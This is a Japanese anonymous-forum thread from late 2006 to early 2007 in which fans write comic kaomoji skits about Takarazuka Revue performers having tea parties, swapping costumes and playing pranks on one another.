満腹になった( ●´▽`● )を見て崩れ落ちるオレクマ@アヒに呪詛


198 :名無しさん@花束いっぱい。:2006/12/09(土) 08:11:47 ID:C9eCL9gy
つーかそのお口は(●▽●)の口やで〜>196、197かなみん@トウコ

かなみさんのお口はもうちょっと小さい( ● ´ ∇ ` ● )なんですよね〜@あすか

2人でいると(●∨●)すら平気に思えるから不思議やな〜@あすかとイチャイ(ryモードでおのろけ中なトウコ
@プレお披露目まであと1週間切りました




(●∨●)ちゃん…@はるか後方でどうして自分に来てくれないのかとorzなシミコ
@ひょっとしてアヒの鬱がうつってる???

199 :名無しさん@花束いっぱい。:2006/12/10(日) 13:43:38 ID:XanKIqD0
きっと携帯では出ないんですよ〜っとフォロー@キリユヒ
@…小さなお口なのに何故あんなに…
Σ(`(ェ)´;)また重たくなったのか…orz


なぁチギ〜しみこが使いモンならへんようになってるやん〜
@組子が心配なトウコ(ここらでしみこに押し付けよう!)

イヤでつね、ボクはしみこタソのオムコタソでつよ?しみこタソはオヨメタソでつ!エッヘン@いばりんぼ(●∨●)

えっ…@それでいいのかと星組子の視線がしみこに
プチデコビームもつけとこうかしら@親切すずみん

200 :名無しさん@花束いっぱい。:2006/12/10(日) 19:02:11 ID:+GXBTih1
(゚-゚) 人(●▽●)人(●∨●)
200ゲトでつ〜♪

201 :名無しさん@花束いっぱい。:2006/12/11(月) 19:15:24 ID:GFoa4ZIS
うわ〜ん!
200ゲットなら、ちぎちゃんがオヨメサンに来てくれると思ったのに〜
号泣のしみこ「ageてやるー!」

202 :名無しさん@花束いっぱい。:2006/12/11(月) 20:32:22 ID:kVsQtIfv
(●∨●)トプのホクショタソはいづる姫がいるでつが蘭とむタソはお嫁さんがいないでつ。
ボクは蘭とむタソのお嫁さんをめざすでつ。

203 :名無しさん@花束いっぱい。:2006/12/12(火) 00:00:53 ID:YO+xjkRJ
そういえばオサレ組には娘トプさんがいるけど、赤面組や
ポスター組には娘トプさんいないなぁ@ぼーっとともちん
@(●▽●)(●∨●)兄弟の暴走を止める気ゼロ

204 :名無しさん@花束いっぱい。:2006/12/12(火) 15:14:07 ID:0xtObMoz
なんだかんだでもう、かしるい千秋楽か・・・@雪時代に想いをはせるとうこ

回想:
━┏ 
 ━ 

冫、
`  


・・・なんかまだおる人もあるけど・・・@後ろを見ないようにするとうこ

205 :名無しさん@花束いっぱい。:2006/12/12(火) 17:17:07 ID:AD8qf5W/
アタシのこと呼んだ?@またもや目立てるかと期待のオサ。あらっ!マツィオ様もご一緒。

206 :名無しさん@花束いっぱい。:2006/12/14(木) 23:43:20 ID:+IHIh/Iq
2日間も誰も相手にしてくれないので、
鏡開きの練習をしてみるオサ&マツィオ

(●▽●)(●∨●)<それ、なんでつか〜?

207 :名無しさん@花束いっぱい。:2006/12/15(金) 01:47:08 ID:Jl+ESVUH
餅のかわりにそっと( ● ´ ∇ ` ● )を差し出すオレクマ@割ってくれマサチャーソ

208 :名無しさん@花束いっぱい。:2006/12/15(金) 15:18:46 ID:vQVYrHDV
餅!餅!どこかなみん(●´▽`●)食べ物情報は聞き逃さない。けど、お正月に大劇場でするのは、鏡割りじゃ…餅じゃなくお酒!

209 :名無しさん@花束いっぱい。:2006/12/15(金) 23:37:33 ID:AvCPKHoE
鏡割りの時、間違って(●▽●)を叩いてしまわないか心配してる宙組子@分裂しちゃう・・・((((;゜Д゜)))

210 :名無しさん@花束いっぱい。:2006/12/16(土) 09:28:53 ID:ZQjwWsEo
(●▽●)ボクたちが叩くから大丈夫でつ!
\(●▽●)(●∨●)/

211 :名無しさん@花束いっぱい。:2006/12/16(土) 17:59:13 ID:D1s5AQto
熱湯の準備は万端や!@きりや教官
えーっと、ビーム発生装置のメンテも済んだかな@ゆうひ先生
いつ増殖しても大丈夫! 楽屋から出動するで〜!!@元旦から公演きりゆひ

開演1時間半前に、そんな余裕ないでしょー?!@さすがに焦るえりさん

マサチャーソの雄姿を見に行くつもりですが何か?@オレクマ
餅! 酒! 紅白饅頭どこかなみん〜!!!@(●´▽`●)

崩れ落ちるえりさんの背後に忍び寄る影@アヒ@鬱組も元旦公演します?

212 :名無しさん@花束いっぱい。:2006/12/16(土) 21:49:47 ID:zlKWusY9
焼こうか?@デコビームスタンバイかしげ

213 :名無しさん@花束いっぱい。:2006/12/16(土) 22:18:19 ID:/+0AixdN
カナミタソ、またぼくのお口つけてまつよ〜@(●▽●)

大きな口でイパーイ食べようってのか…@リフトする身になってくれorzなオレクマ

食べ物どこかな?みん@相変わらずマイペース( ● ´ ∇ ` ● )

214 :名無しさん@花束いっぱい。:2006/12/17(日) 03:35:42 ID:wgM+tJDR
(●´∇`●)人(●´▽`●) たべものどこかな?みん〜

!!!!!!!!!!@月組生

(●▽●)<アハハハハ〜 カナミソがふたつもいるでつ〜

増殖するのは(●▽●)だけじゃなかったんだね〜@スタンバイしたままにこにこかしげ

215 :名無しさん@花束いっぱい。:2006/12/17(日) 09:13:03 ID:EiDS1FsG
エンゲル係数がえらいことに・・・@ガクブルするオレクマ

いっそ畑でもつくりますか@農夫の格好(アーネスト&オクラホマの衣装)に着替えだす月組子達

216 :名無しさん@花束いっぱい。:2006/12/19(火) 02:56:48 ID:vZGKbbdR
無いものは無いんだ!@霧ルキーニ@たまにはガツーンと言ってやらんとな!


死〜なせて〜@オレクマシシィ@動揺のあまり錯乱気味

217 :名無しさん@花束いっぱい。:2006/12/19(火) 08:10:31 ID:crnEW8D4
死ねばいい!クマナベート!待っていたぁぁ!
@相手役(?)に誘われて出てきたサエコトート@お久しぶりです

218 :名無しさん@花束いっぱい。:2006/12/19(火) 10:18:33 ID:tq0PuFDP
クマナベート菜園・・・もとい再演か@なんだかんだで着替えてるユヒカル

次は私なのに・・・@半泣きのミズ

219 :名無しさん@花束いっぱい。:2006/12/19(火) 14:25:03 ID:/+AW9xXn
「私が迎えにいくよ」と、
クマナベートとサエコトートの間に割って入るオサトート@目立つチャンス〜♪

220 :名無しさん@花束いっぱい。:2006/12/19(火) 14:37:53 ID:W3b3l/kd
クマナベ、クマナベ(●´∇`●)

221 :名無しさん@花束いっぱい。:2006/12/19(火) 16:09:50 ID:otdqjJb1
ホタルイカ見ぃつけたぁ(はぁと)
オサトートに狙いを定めたかなみん。
だって青く光ってるじゃない。

222 :名無しさん@花束いっぱい:2006/12/19(火) 23:43:04 ID:8x9j5XRn
そうだそうだ

223 :名無しさん@花束いっぱい。:2006/12/20(水) 11:36:09 ID:g5uZzA6V
トートが二人ならシシィも二人いるわよねぇうふ。
鏡の間のドレスを着るミズ@心はヲトメ

224 :名無しさん@花束いっぱい。:2006/12/20(水) 20:51:46 ID:zelcCdqS
月組子やん 何事もなかったようにパリのお稽古を始める

225 :名無しさん@花束いっぱい。:2006/12/21(木) 14:44:21 ID:v6pB4/Yh
(●▽●)人(●∨●)ぼくたちもお稽古がんばりまつよ〜

クマナベートとサエコトートの間に割って入ろうとしているオサトート。
そしてクマナベとホタルイカに狙いを定めてwktkな(●´∇`●)。
鏡の間のドレスを着ようとしている乙女なミズ。
何事もないようにその周りで戯れまくっている(●▽●)(●∨●)。

そこでお稽古を始めている月組子にある意味恐れを感じ鬱になっているアヒルが一羽・・・
@とむ早くあの兄弟を迎えに来て・・・orz

アヒちゃんいつになったらこの場に馴染めるんだろうね@楽までもうちょい英国王室御用達の紅茶を一杯コム
@ところでミズ、まだ東宝公演中でしょ・・・?

コムさんの邪魔をするなんてミズさんたら♪@ニコニコ笑顔でも心は憤怒のまーちゃん

226 :名無しさん@花束いっぱい。:2006/12/21(木) 15:03:07 ID:qcbdXErp
じゃあ次はこの青天ねー!
@雪組秘蔵の青天コレクションを蘭とむに被せて喜ぶかしげ

お似合いですわ@にこにこるいちゃん

「……というわけで迎えに行けません」とあひに手紙を書く蘭とむ
@今が楽しければそれでいーやーヽ(´∇`)ノ

227 :名無しさん@花束いっぱい。:2006/12/22(金) 00:03:00 ID:fqqp2Rld
静々と鏡の間のドレスに着替え始める彩音
@オサさんとご一緒ならどこへでも
@3年後位にはホントに来てそうだ

228 :名無しさん@花束いっぱい。:2006/12/23(土) 12:51:19 ID:Jo05khoH
もーしょーがないなぁ、ダンボールに詰めて送りかえそか@きりや教官@もう慣れっこ
そーだね、しょーがないねぇ@ゆうひ先生@ガムテ片手に

229 :名無しさん@花束いっぱい。:2006/12/23(土) 14:54:23 ID:t7N3Sii6
よし、いくか@腕捲り腰リュウ

230 :名無しさん@花束いっぱい。:2006/12/24(日) 01:21:38 ID:8xBvU8Bk
蘭とむさん、ダンボールが届いたら、月組の皆さんへお礼状を書いてくださいね
@にっこりるいるい@何げに上級生をあごで使ってます


231 :名無しさん@花束いっぱい。:2006/12/24(日) 19:03:58 ID:+lgIWgvb
チギチャソ、あれが妖精さんでつよ@腰リュウを指さす(●▽●)
あれ、昨日のTVと違うでつ。お帽子がないでつ@腰リュウを見上げる(●∨●)
帽子、帽子v@アーネストの歌を歌い出す(●▽●)(●∨●)

232 :名無しさん@花束いっぱい。:2006/12/24(日) 22:10:22 ID:vlu9fn1v
ん?なんか五月蝿いなー季節はずれの蝿かな?
@おもむろに蝿叩きを取り出す腰リウ

   バシッ!

(×△×)(×∨×)キュウ〜

233 :名無しさん@花束いっぱい。:2006/12/24(日) 22:42:50 ID:SuEqxS6h
いつのまにダンボールから抜け出たんや@(×△×)(×∨×)を見下ろしながらきりやん
ダンボールやめて、木箱にしようか?@右手にクギ、左手にカナヅチゆうひ先生

木材や大工道具なら、うちにまかせて下さい!@コー○ン印のベニヤ片手にすずみん登場
(×△×)(×∨×)を素早く捕獲@一時躁転あひ@この2人から離れられるなら!!
え? 届くのはダンボールじゃないんですか??@訳もわからずキャッチャーに任命された蘭とむ

82期生はいい味出してるね〜@明日からは女優コム@今日はキャラメルマキアート
明日からは、傍観者として楽しみましょうね、コムさん@にこにこまー@もう巻き込まれない

234 :名無しさん@花束いっぱい。:2006/12/25(月) 08:15:34 ID:nG0sn3nG
聞ぃてよデニスゥクマと一緒にドレスなんか着てるのよ!
一升瓶片手にくだをまくトナミ@娘1としてのプライドの問題よぉ。

久しぶりにデコビーム行っとく微笑むカシゲ。

対岸の火事@イチャイチャ(ry・・トウあす


235 :名無しさん@花束いっぱい。:2006/12/25(月) 14:18:11 ID:wb2PhJch
となみさんもまだまだですわね、自分のドレスを貸すくらいの芸当が出来なくてはね、クスッ@久々登場マリタソ

(゚-゚)<タカコモオドレキタヨ。スタンバッタダケダケド

236 :名無しさん@花束いっぱい。:2006/12/25(月) 14:25:36 ID:NxRAdtUu
あの…今日から、私もイチャイ(ryしていいんです、よね…?
@くだをまくトナミに慌ててドレスを脱いで男役に戻るものの、オドオドしているミズ

237 :名無しさん@花束いっぱい。:2006/12/25(月) 14:36:07 ID:poKYX2uA
と、となみさんよろしくお願いします(ドキドキ)@乙女モードが残ってる水
よろしくお願いします。水さん、となみロイヤルミルクティーが飲みたいな
@にっこりとバラ色の微笑みなとなみ
え、えっと、茶葉はどこのがいいですか?@ルンルンと茶葉を選ぶ水

(゚-゚)……@何か水に親近感を覚えるタカコ

まーちゃんのお仕込みで水もいいお茶を煎れるようになったねぇ
@まーちゃんとくつろぐコム
嫁入り修行が間に合って良かったですね〜@にこにこまーちゃん

何か間違ってる…でもまぁいいか@ハマ・ゆみ・キム他組子

238 :名無しさん@花束いっぱい。:2006/12/27(水) 03:22:25 ID:ppgwetwf
アラ、タカコさんにはワタクシがお茶をいれて差し上げなければ。
ワタクシはタカコさんのパートナーですもの♪クスッ@ご機嫌マリタソ
(゚-゚)…パートナー…ソウダネ、ハナ…

(●▽●)あ〜マリタソお久しぶりでつ!タカコサン、僕はこんなに大きくなりまつた!
はっ…チギちゃんの元気がないでつ!!タカコサン!!
(T∨T)同期が二人も辞めるでつ…杏ーナルー(涙)

239 :名無しさん@花束いっぱい。:2006/12/27(水) 12:43:35 ID:o273WN3X
もくもくと大量のお茶を淹れ始めるかなみん@笑顔

うちは嫁が淹れてくれるんだぞと自慢気な俺クマ@笑顔

240 :名無しさん@花束いっぱい。:2006/12/27(水) 12:52:21 ID:2l5B+Wgz
さーてどんなオチになるかな@生暖かく見守るきりやんとゆうひ先生

241 :名無しさん@花束いっぱい。:2006/12/27(水) 12:58:15 ID:USk2HsFy
となみ…さん、ケーキもあるよ?@フリルのエプロン姿で手作り水
となみ、いちごのケーキが好きー(はぁと)@お姫様スマイルとなみ
(*´∀`)じゃあ沢山乗せるね!
@ケーキの香りに釣られてやってきたかなみんを足で防御中@成長?

水…立派になって…@男泣きハマコ

242 :名無しさん@花束いっぱい。:2006/12/27(水) 13:38:14 ID:Hgzuxy5A
ぽつねんと取り残される俺クマ@張り付いた笑顔@手には湯のみ(空)

やっぱりな@きりやんとゆうひ先生

243 :名無しさん@花束いっぱい。:2006/12/27(水) 13:58:56 ID:fFqBQeET
(●▽●)ボクの好きなモノはすとろべりぃとしょぱんでつよ★
@東宝もよろしく
チギタンのためにミズサンにケーキもらいにいくでつ!!
@相次ぐ同期の退団で泣き続けている(●∨●)を慰める(●▽●)

244 :名無しさん@花束いっぱい。:2006/12/27(水) 20:53:55 ID:fkWPLCg+

 グサッ!    *
          ||
       (○▽○)いたいでつー

ほらっ!ショートケーキできあがりっっ!
@タニの脳天にローソクを突き立てるオレクマ

あんたたちッ!アタシが困ってるの見て楽しんでるでしょッ!
そうよ、そーに違いない!@やけっぱちオレクマ

図☆@ゆうひ先生&きりや教官

うわあああああ〜ん、学年同期と出身同期がいぢめる〜〜〜〜〜
マサチャーン@泣きながら家出オレクマ

公演近いし家出はちょっと困るんちゃいます?
@玉露をすすりながらきりや教官
大丈夫、あの方に追跡をお願いしてるから
@アールグレイをすすりながらゆうひ先生

それじゃ行ってきます!お任せ下さい!
@華麗なツーステップを披露しながら追いかけるマツィオ先生
@白衣の下はスーパーマンのTシャツ


245 :名無しさん@花束いっぱい。:2006/12/27(水) 23:07:33 ID:wy927bT1
え?何?@黒蜥蜴ということでマダムすみれ風の衣装をあやねに着せてるオサ
@あやねキレイヨあやね


ウワァァン・・・。・゜゜(ノД`)←オレクマ

246 :名無しさん@花束いっぱい。:2006/12/27(水) 23:16:57 ID:BzQmLuNH
(`(ェ)´)同期のかしげ!オレクマと…@同期愛にすがるオレクマ

……るいちゃん、それじゃ入らないよ?
@るいちゃんの荷物をパキパキ詰めるかしげ
@東宝移動しなきゃ

かしげさん、自分でしますから!@耳まで真っ赤るいるい

いいよぉ。ついでだから、ね(にっこり)@キラキラ光線かしげ

かしげさん…(うるうる)@司会の隅に入ったオレクマを小指一つで月組に投げ飛ばし

247 :名無しさん@花束いっぱい。:2006/12/28(木) 00:06:31 ID:zCUgnbje
オレクマドンマイww

248 :名無しさん@花束いっぱい。:2006/12/28(木) 00:23:44 ID:RatmC/70
こうなったら元花の同志だ!チカチャーン@再び月組から抜け出すオレクマ

水さんのケーキ美味しい@ニコニコとなみ
ちょうどお茶も入りましたので飲んでくださいね@ルンルン水

ウワァァァン@泣きながら雪から走り去るオレクマ@ドウシテオレサマダケorz

249 :名無しさん@花束いっぱい。:2006/12/28(木) 01:46:55 ID:GL/aSEzR
よし、熱いバリケードとプチでこビームで防御は完璧やな@来ないだろうと思いつつ、ぬかりないとうこ

>>248さんのIDが蘭とむさんに似てる〜@傍らのあすか@元花

250 :名無しさん@花束いっぱい。:2006/12/28(木) 07:30:37 ID:9gg+EwJ0
ってか、食べ物さえ与えとおけばご機嫌なかなみんは扱いやすいんじゃ…と思っても言えない月組子@面白いし放っておくか

251 :名無しさん@花束いっぱい。:2006/12/28(木) 15:07:48 ID:d5nqG9et
…組子は駄目だ!
嫁のいないトプオブトプ様なら、オレの気持ちをわかってくれるかもしれない!@全力疾走オレクマ


イシチャーン?  ‐  ‐ 
(瞳∀瞳)   」 イシチャーン? 
つ 冫、 ━┏ (゚-゚)⊂
  ^つっ ━ ⊂ イシチャーン?
イシチャーン? 


…ムコ達に囲まれてるぅぅぅぅぅ!!!@号泣オレクマ

252 :名無しさん@花束いっぱい。:2006/12/30(土) 10:23:33 ID:6DvLqJcR
さっ、帰るよ〜@ツーステップで追い付いたマチオ
うっうっ・・・誰かオレサマを癒してくれ・・・@哀れオレクマ@通った跡に涙の川

253 :名無しさん@花束いっぱい。:2006/12/30(土) 11:48:16 ID:pa8WQGtj
(●V●)あーオニイタソ、川ができてまつ!
(●▽●)ほんとでつねチギタソ!きれいでつ〜!
やまとゆう河と名づけるでつ!!



254 :名無しさん@花束いっぱい。:2006/12/30(土) 17:31:22 ID:8l2H6uIP
チギちゃん…元気になってよかった…@一安心、和@本当は自分が慰めに行きたかった

255 :名無しさん@花束いっぱい。:2006/12/31(日) 01:55:14 ID:+8F5W3jR
あっ…その健気さに心を打たれてしまった乙女ミズ@しみこっ貴方も乙女なのねっ
水さ〜んっっ@ウルウルしみこタン
あのキザってるしみこが…若手のホープが…@地味にショックなじゅんこサン
ボクも悩める乙女っ…(`(エ)´;)便乗してみるオレクマたん
アンタは違うでしょ、と冷静ツッコミゆうひさん

そんな人達をよそに、
(●▽●)ハッハッハールパンが(゚-゚)サンを頂いたでつ〜♪
(●∨●)ワーイ!ルパンを捕まえるでつー!
…ん?!…(゚-゚)サン?!@聞き流そうとしてた全組子
@これがホントの、もっとも危険なゲーム…


256 :名無しさん@花束いっぱい。:2006/12/31(日) 02:03:05 ID:mQKuXVdH
はっ!二人の乙女が泣いている!?慰めに行かなくては!@心は男前うめ
ああ・・・育て方は間違ってないはずなんやけど・・・@頭を抱えるじゅんこさん@not二日酔い

だからワタシもシシィやったしっ@ひたすらアピールするオレクマ
じゃあせめてあれを超えてからにしてくれ@同期ゆうひ


あれ→ 冫、
    ^

257 :名無しさん@花束いっぱい。:2006/12/31(日) 23:12:16 ID:isCiuP2c
…(●▽●)が呼んでるから来てみただけなんだけど@(゚-゚)

『あのお方』が来る前に熨斗の用意してーっ@家政婦協会

熨斗つけてお返ししたらさらにお怒りになると思いますー@にこにこかしげ
大丈夫ですよー@にこにこるいちゃん@脅迫状作成
@『世界一の至宝を預かった。byルパン』
@こう表現しておけばお怒りにはなりませんからー。

で、これを誰が届けるの?@家政婦協会

……………@真っ青な顔で首を振る現お世話役

あ、(●▽●)さん、これをフサさんに届けてくださいねv
@片手で鎖を握り締めつつ、あっさりるいるい

いってきま〜つ@(●▽●)

…………そして「だいぼうけん」がはじまったのである@ナレーション蘭トム
@他人事として済ませたいから傍観者役を買って出ました!
……って、弟ーっ! 付いていくなーっ!@すでに半泣き

258 :名無しさん@花束いっぱい。:2007/01/03(水) 01:28:12 ID:/iS5Ss5X
楽しそうですね〜とみっちゃん@天然

259 :名無しさん@花束いっぱい。:2007/01/03(水) 20:18:34 ID:KQrFeLcs
いつ「あのお方」がクスッと現れるかwktk…じゃなくて、ビクビク
@組子(-みっちゃん、兄弟)

タカコサソ〜僕と遊ぶでつ〜♪コワイモノを言っていくゲームでつ!
イエーイ(●▽●)人(゚-゚)
僕はでつね、オバケとママと…

あー僕もそっちがいいでつ!(●∨●)@お届けモノは完了でし!
…あ…届けてしまったのね…@蘭トム


260 :名無しさん@花束いっぱい。:2007/01/03(水) 21:02:45 ID:Mg314mia
「あの方」に直接お届け物をしてのうのうと戻ってこれる(●∨●)って…。
もしかして最強なんじゃ…!@宙組子

何か(●∨●)に負けてる気がするorz@蘭トム

261 :名無しさん@花束いっぱい。:2007/01/04(木) 00:08:08 ID:Rb3yrqmM
(●∨●)ちゃん…ボクとも遊んで……@和@こんな可愛い弟ホシカッタ

262 :名無しさん@花束いっぱい。:2007/01/04(木) 02:05:38 ID:L+KSjuHu
みんな忘れてな〜い?
(●∨●)は、アリスとマリタンの区別がつかないんですよ、ふふふ
@蘭トムに耳打ちするまちゃみお蝶

263 :名無しさん@花束いっぱい。:2007/01/04(木) 05:49:42 ID:GuMvGUcQ
(●∨●)人(●▽●)タカコさんの番でつよ!
(゚-゚)ぇ〜っとね、コワイもの…あ、マリタ…
シッーーー!(゚=゚;)(●∨●;)(●▽●;)

何じゃこりゃー!!@アリス@モノマネ研究中

しぃ〜みぃ〜こ!コラ!ムラ帰らなあかんやろ?
(●∨●)の後追っかけてる場合ちゃうで!@ヘイズは東京瞳子さん
みこはホンマにチギ好きねぇ〜@呆れ同期
@クールな和 涼華はどこへいった

かなみはホンマにチゲ(鍋)好きだなぁ〜@深刻クマさん
@可憐な娘役はどこへいった(*`(エ)´*)のってみますた


264 :名無しさん@花束いっぱい。:2007/01/04(木) 09:17:43 ID:LWD+RkHy
面白くないわね       ックス。

265 :名無しさん@花束いっぱい。:2007/01/05(金) 08:44:26 ID:H6rVffUs
ウワーン!!===(((つ(エ)T)!!

アハハー(●∨●)アリスタソだめでつよー真似してクマさんいじめちゃー!
ックスはアリスかー!!@ドキドキしてた組子
@どうして「あのお方」は来ないのだろう…↓これはいいのか?

(●▽●)人(゚-゚)@今日から二人はコンビ〜♪


266 :名無しさん@花束いっぱい。:2007/01/05(金) 21:32:20 ID:dRAv5KOX
『世界一の至宝を預かった。byルパン』

いつになったらルパンが来るのかしら、5日も待ってるのに@マリタソ

267 :名無しさん@花束いっぱい。:2007/01/05(金) 22:49:29 ID:t9y/8361
あの〜・・・とうこさん、あそこにいる人達は一体・・・
@どちらも自分が元いた組のトップなんですが、とあすか

これっ、見たらあかん!@同期?何それ?と言いたくなったとうこ


まだかなまだかな♪@wktkしてるマリタソ&オサ

268 :名無しさん@花束いっぱい。:2007/01/07(日) 18:23:33 ID:9/rqBFFw

いったいこの後どうしろって言うんですか?!@蘭トム

収集つかないのでageてみる

269 :名無しさん@花束いっぱい。:2007/01/07(日) 19:09:12 ID:chhAn9QI
…とりあえず、オサさんは彩音に迎えに行かせれば大丈夫だよね?
@集まって相談する水・ゆみこ・まとぶん・壮君の新旧苦労人ズ
@問題はもう一方あの御方…

(●▽●)るぱんはボクでつー!
(●∨●)お兄タソがるぱんなら、ボクはふじこちゃんやるでつ!


270 :名無しさん@花束いっぱい。:2007/01/07(日) 20:34:05 ID:K+OiWRAA
じゃ、(`(ェ)´)は同期のゆうひ先生お願いしますわ@(●´∇`●)を隠しながらきりや教官
仕方ないなあ…@シシィドレスをアルマソド服に持ちかえゆうひ先生

相談も終わりましたし、そろそろ組に戻りますか@苦労人1@雪2番手
うん…@苦労人2@雪男トップ

イチャイry@雪トップコンビ

他の組は収拾ついたけど、うちの前トップと時期トップは、誰も収めてくれないねえ
@にこにこかしげ@現トップ
そうですわねー@かしげの服を裾をきつく握りしめるるいるい@このまま傍観決め込み

271 :名無しさん@花束いっぱい。:2007/01/07(日) 20:39:48 ID:K+OiWRAA
 |
 |⌒彡 クスッ 
 |冫、)
 |` / <3段目の「雪トップコンビ」は
 | /    「星トップコンビ」の間違いですわね 
 |/
 |
 |

 |
 |  サッ
 |)彡
 |
 |

今、誰かの声がしたねえ@にこにこかしげ
…空耳ですわッ!!!@滝汗るいるい

272 :名無しさん@花束いっぱい。:2007/01/07(日) 22:40:37 ID:8ES6VeF0
組に戻る途中、ゆうひ先生の置いていったシシィドレスを手にとる水

乙女モード発動・・・

273 :名無しさん@花束いっぱい。:2007/01/08(月) 01:28:17 ID:nAwimxil
…ハマコさん、あれお願いできますか@もうお疲れゆみこ
@同期に頼むのが良いってきりやんが言ってるし


同期…。では(●▽●)さんのことは右京さんに
お願いしましょう!@にっこりるいるい


274 :名無しさん@花束いっぱい。:2007/01/08(月) 03:27:05 ID:8EmCelGO
ひたすらホワイトボードに何かを書いているうきょきょ
@そうだ今は東京公演中

275 :名無しさん@花束いっぱい。:2007/01/08(月) 20:04:28 ID:9GE4vHE/
平和だねぇ〜@にこにこ宙1
そうですね@にっこり宙娘1
そうでつね〜@アハハー(●▽●)人(●∨●)
あはは〜@ふにゃふにゃ笑顔のオサレトプ様
あは‥あははは…orz@蘭(ry

276 :名無しさん@花束いっぱい。:2007/01/08(月) 21:27:13 ID:Ha3RDhHF
水からシシィドレスを奪い取り着用するハマコ@発声練習開始

ハマコから手渡されたベルトのカタログに夢中のミズ@無言で検討中


277 :名無しさん@花束いっぱい。:2007/01/08(月) 22:38:43 ID:RCtgnQe5
よし、久しぶりに商売商売!@算盤片手にじゅり社長
@ベルトカタログもうちから出してます

278 :名無しさん@花束いっぱい。:2007/01/08(月) 22:57:56 ID:G+9aDMY2
べっさめ〜べさめむ〜ちょ(はぁと)♪@シシィドレスでご機嫌に歌い出すハマコ

いーやーーぁぁ!@ダッシュで逃げるエリキム@アルバトロスとまーちゃんMSの記憶が…

279 :名無しさん@花束いっぱい。:2007/01/08(月) 23:40:19 ID:nAwimxil
あらハマコ、ドレスのファスナーが上まで上がってないわよ
@さらりと毒舌あみたん@里帰り

280 :名無しさん@花束いっぱい。:2007/01/09(火) 00:48:48 ID:eZMHsDKz
相変わらずこすい商売をやっているねぇ、樹里社長
あーっはっはっは
@ハンカチ王子あひ

…鬱転じてとうとう壊れたかっ!?
@マジびひりの月組子
@OGに喧嘩売るなんて…

281 :名無しさん@花束いっぱい。:2007/01/09(火) 02:46:10 ID:ZEo7nhAr
オレクマサソのドレスでもファスナーがしまらないなんて、ハマコサソは大物でつー
@いらんこといい(●▽●)

282 :名無しさん@花束いっぱい。:2007/01/09(火) 02:58:34 ID:wOJzwAkz
どうやら>280アヒさん、鬱になりすぎて躁のほうに入っちゃったみたいですねぇ
@のんびりともちん

まぁしばらくしたら鬱モードに戻るから様子見してたんでいいと思うけど
@おっとり七・十コンビ

久々に登場…か?!

283 :名無しさん@花束いっぱい。:2007/01/09(火) 04:32:21 ID:4kBBOKlO
…ワタクシのタカコさんはいつ戻ってきますの?
こんな書き置きを残したまま行ってしまって丸9年…
ルパンも来ませんし、マリタン少し寂しいですわ。
「ハナ、(●▽●)と遊んでくるね。(゚-゚)より」

…ハマコ、そのおドレ、元は誰のものかしら?

284 :名無しさん@花束いっぱい。:2007/01/09(火) 08:31:54 ID:UN3PS3gm
オレクマさんのですが、何か?@戴冠式ドレスでエーヤンを歌うハマコ@初演のエーヤンの歌手

285 :名無しさん@花束いっぱい。:2007/01/09(火) 13:33:35 ID:eZMHsDKz
それでもやっぱりファスナーは上がっていないようだねぇ
あっはっはー
@ハンカチひらひらアヒ

上がってないでつー(●▽●)
でつー(●∨●)
@ハンカチにじゃれつく兄弟

………@ハンカチを蘭トムに投げてみるアヒ
@石をくるんであります

わー(●▽●)(●∨●)
@追いかける兄弟

今度からあの手も使えそうやな@きりや教官

286 :名無しさん@花束いっぱい。:2007/01/09(火) 14:29:20 ID:ZEo7nhAr
やめてくれぇぇぇ!@必死で逃げる蘭とむ

287 :名無しさん@花束いっぱい。:2007/01/09(火) 15:02:00 ID:+BH5ZBG7
蘭とむさん頑張れぇ〜@のんびりともみち七十

288 :名無しさん@花束いっぱい。:2007/01/09(火) 22:11:16 ID:T/1OCEWi
後頭部を直撃しそうになった石付ハンカチをキャッチしてしまう蘭とむ@しまった!!!!!

わ〜〜〜ひらひらひらひらヽ(●▽●)ノヽ(●∨●)ノ

・・・・いつまで振ってりゃいいんだろ@仕方なくハンカチを振って兄弟の気を引く蘭トム

289 :名無しさん@花束いっぱい。:2007/01/09(火) 23:31:09 ID:lZhZji6e
ん? とりあえず公演終わるまでv@にこやかにかしげ
@あ、るいちゃん、お茶にしようか?

私がお茶淹れますから! 座っててくださいっ
@るいるい@お茶菓子も、かしげさんが甘いものが
苦手ということで、あまり甘くないのを用意しましたv

うわぁ、ありがとうるいちゃん!@かしげ
@どこまでもイチャ(ry

………ひらひらひら@蘭トム

ねえ、蘭トムが振ってるの、SOSの旗に見えるんだけど…@ミズ

わたしにもそれに見えるが、気にするな、かしちゃんからの
SOSビーム以外には反応しなくてよし!@こんどはスカーレットドレスなハマコ

そだね…じゃあ皆の分のお茶淹れるねー@ミズ@どうやらお茶係

雪って一体………orz@蘭トム

290 :名無しさん@花束いっぱい。:2007/01/09(火) 23:53:07 ID:kotCEMUj
みずさぁん、となみシナモンの香りのミルクティ飲みたいな♪
@甘えんぼさんとなみ
そ、そうなの?それじゃとなみちゃんには特製ミルクティいれちゃおっかなー
@甘えられて嬉し恥ずかしミズ

…@あやね言葉少な
ん?あやねちゃんはロシアンティーがいいの?薔薇のジャムで
飲んでみたいって?んー任せなさいっっ
@言葉を発さなくても分かるんですオサ

フッ私たちは大人のワインだね@86年ものなんかどう?トウコ
いやーん、酔わせてどうするつもり??@人差し指で肩をつんつんあすか

…うわーーーーーーーーーーーーーーーーーん
@オレクマ、嫁がレストランの食べ放題に入り浸りで相手にしてくれません
@目から汗が滝のよう

まだドリーム抱いてまっせ@きりや教官、手に男らすぃ湯のみで玉露
諦めが肝心なのにねぇ@ゆうひ先生、ウェッジウッドでレモンティー

291 :名無しさん@花束いっぱい。:2007/01/10(水) 00:51:17 ID:+9rpDjmp
まぁ、皆さんもお茶を嗜まれるようになりましたのね、良かったですわ〜
@にこにこまーちゃん@今日は正式な中国式茶道で高級烏龍茶

まーちゃんのお茶魂が各組へ受け継がれて良かったねぇ
@烏龍茶片手にヘイズ・コードご観劇コム

お茶魂以外の部分も各組の特に娘役トップさん達に受け継がれている気がしますが…
@苦労人ズこっそりつぶやき

292 :名無しさん@花束いっぱい。:2007/01/10(水) 01:05:06 ID:eb1+MiVx
(T(ェ)T)

うわ〜マジ泣きしとりますわ@ゆうひ先生の紅茶をいただくきりや教官

みじめだね〜@きりや教官の玉露をいただくゆうひ先生

(●´∇`●)つ◇    Σ(T(ェ)T)
か、かなみがオレクマに湯葉を…!@互いの器にヒビが入ったきりや&ゆうひ
@ありえへん!こんなことありえへん!

遂にうちのトプに幸せが!?@進展が気になる月組子@一線を凌駕したアヒを除く
@あの人まだ笑っているよ…

293 :名無しさん@花束いっぱい。:2007/01/10(水) 14:32:08 ID:IE9ocBqs
